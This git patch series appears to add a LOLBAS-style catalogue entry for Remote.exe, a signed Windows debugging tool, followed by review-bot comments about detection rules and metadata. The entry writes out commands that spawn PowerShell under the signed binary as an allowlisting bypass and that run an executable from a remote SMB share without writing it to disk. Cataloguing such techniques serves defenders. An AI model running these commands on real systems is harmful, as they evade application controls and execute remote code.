From 7dab1b916e485bc5e3494dc0cf89f07508f153a9 Mon Sep 17 00:00:00 2001 From: ahmad Date: Wed, 6 Jan 2021 20:48:25 -0500 Subject: [PATCH 1/2] Create remote.yml --- yml/OtherMSBinaries/Remote.yml | 43 ++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 yml/OtherMSBinaries/Remote.yml diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml new file mode 100644 index 0000000..9f3b4d3 --- /dev/null +++ b/yml/OtherMSBinaries/Remote.yml @@ -0,0 +1,43 @@ +--- +Name: Remote.exe +Description: Allows you to run command-line programs on remote computers +Author: mr.d0x +Created: 1/6/2021 +Commands: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: AWL Bypass + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere + Description: Run a remote file + Usecase: Avoiding any writes to disk + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe +Code_Sample: + - Code: +Detection: + - IOC: remote.exe spawned +Resources: + - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- \ No newline at end of file 
From 4254927f78d46a84e495966138b4f1ff81c223b6 Mon Sep 17 00:00:00 2001 From: Ahmad AS Date: Wed, 6 Jan 2021 23:31:01 -0500 Subject: [PATCH 2/2] Update Remote.yml --- yml/OtherMSBinaries/Remote.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 9f3b4d3..8e7a935 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -1,6 +1,6 @@ --- Name: Remote.exe -Description: Allows you to run command-line programs on remote computers +Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 1/6/2021 Commands: @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary @@ -19,15 +19,15 @@ Commands: Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file - Usecase: Avoiding any writes to disk + Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe @@ -40,4 +40,4 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- \ No newline at end of file +---
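Review bot: in the first patch (the new-file hunk of yml/OtherMSBinaries/Remote.yml), the Detection entry `- IOC: remote.exe spawned` is too broad to be actionable: it fires on every legitimate use of the debugger tool installed under `Windows Kits\10\Debuggers`. Consider tightening it to what the listed commands actually look like, for example remote.exe creating a child process that is a shell or script host (the two `/s "powershell.exe"` entries) or remote.exe invoked with `/s` and a UNC path as its argument (the `\\10.10.10.30\binaries\file.exe` entry), and noting that the parent is expected to be a debugging session rather than an Office or browser process. The same hunk leaves `MitreID:`, `MitreLink:` and `Code_Sample: - Code:` empty; either fill them (Execution via a signed binary is the relevant technique family) or drop the empty keys so the file validates cleanly. Also, `Created: 1/6/2021` is ambiguous between 6 January and 1 June; an ISO date (2021-01-06, matching the commit date) avoids the ambiguity.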
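Review bot: in the second patch, hunk `@@ -1,6 +1,6 @@`, the new `Description: Debugging tool included with Windows Debugging Tools` is more accurate than the original wording but drops the one fact a reader needs to understand the entries below, namely that the tool is meant to run command-line programs and expose their console over a named-pipe session. Suggest keeping both halves, e.g. `Description: Debugging Tools for Windows utility that runs a command-line program on a remote computer`, so the `/s "powershell.exe"` commands make sense without following the Resources link.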
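Review bot: in the second patch, hunk `@@ -11,7 +11,7 @@`, blanking `OperatingSystem:` removes information instead of correcting it. Since the binary ships with the Windows Kits debugging tools (see the `Full_Path` entries) rather than with any particular OS release, the version list was indeed misleading, but an empty value tells the reader nothing; state the actual constraint, e.g. `OperatingSystem: Windows (requires Debugging Tools for Windows / Windows SDK)`.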
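Review bot: in the second patch, hunk `@@ -19,15 +19,15 @@`, the reworded `Usecase: Executing a remote binary without saving file to disk` is clearer, but the claim should be qualified: loading an executable from a UNC path still results in the image being fetched over SMB and mapped by the loader, so "without writing to disk" means no copy is dropped locally, not that nothing observable happens; a short note on that in the Description (and a matching Detection hint about remote.exe with a UNC path argument) would help defenders reading the entry. The second `OperatingSystem:` blanking in this hunk has the same issue as the previous hunk and should get the same replacement value for consistency.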